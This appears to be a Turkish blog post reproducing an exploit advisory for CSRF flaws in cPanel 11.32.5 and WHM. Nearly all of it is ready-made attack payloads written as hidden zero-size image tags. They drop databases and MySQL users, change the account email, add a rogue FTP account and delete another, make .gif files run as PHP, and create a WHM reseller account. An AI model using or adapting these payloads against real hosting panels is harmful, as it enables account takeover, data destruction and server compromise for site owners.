cpanel 11.32.5 (build 11) 11.32.5.11 CSRF Vulnerabilities

cpanel 11.32.5 (build 11) 11.32.5.11 CSRF Açığı bulundu Açığa ilişkin exploit ve Açıklamalar şu şekilde

========== 
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] 
Vulnerability: CSRF 
Vendor: cpanel.net 
========== 
 
===================================================================== 
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] 
 
Aka: Cpanel Accelerated 2 
via 
WHM 11.32.5 (build 11) 
 
===================================================================== 
 
CSRF: Drop Database: (Method $_GET) 
 
<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" 
width="0" /> 
 
Here we are going to drop database named: armenian_music 
===================================================================== 
 
CSRF: Drop mysql user: (Method $_GET) 
 
 
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" 
heigth="0" width="0" /> 
Here we are going to drop mysql user named: armenian_adserver )) 
 
===================================================================== 
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET) 
Changing email address to: owned_and_owned_again@gmail.tld 
 
<img 
src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again@gmail.tld&sec 
ond_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" 
heigth="0" width="0" /> 
 
 
===================================================================== 
 
CSRF adding FTP account: 
 
username: akastep 
password: akastep 
host is target host. 
 
 
<img 
src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_ 
jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" 
heigth="0" width="0" /> 
 
===================================================================== 
 
 
CSRF Drop FTP account: 
 
Deletes existent ftp account named: axaxa 
 
<img 
src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel 
_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" /> 
 
===================================================================== 
 
 
CSRF change Apache handler: 
 
(Parse .gif file as php script) 
 
<img 
src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&su 
bmit=Add" heigth="0" width="0" /> 
===================================================================== 
 
 
CSRF Delete handler: 
 
 
<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" 
width="0" /> 
 
 
===================================================================== 
 
WHM 11.32.5 (build 11) 
 
CSRF: Add Reseller setup 
with domain: owned.com 
username: owned111 
password: MYVERYSTRONGGOESHERE 
And contact email: owned@owned1.you 
 
<img 
src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller setup&domain=owned.com&username=o 
wned111&password=MYVERYSTRONGGOESHERE&contactemail=owned@owned1.you&dbuser=owned&msel=n,y,1,n, 
x3,1,1,1,1,1,1000,n,0,0,default,en,,,Reseller setup&pkgname=&featurelist=default& 
;quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0& 
amp;cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" 
width="0" /> 
 
================================================  

 

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir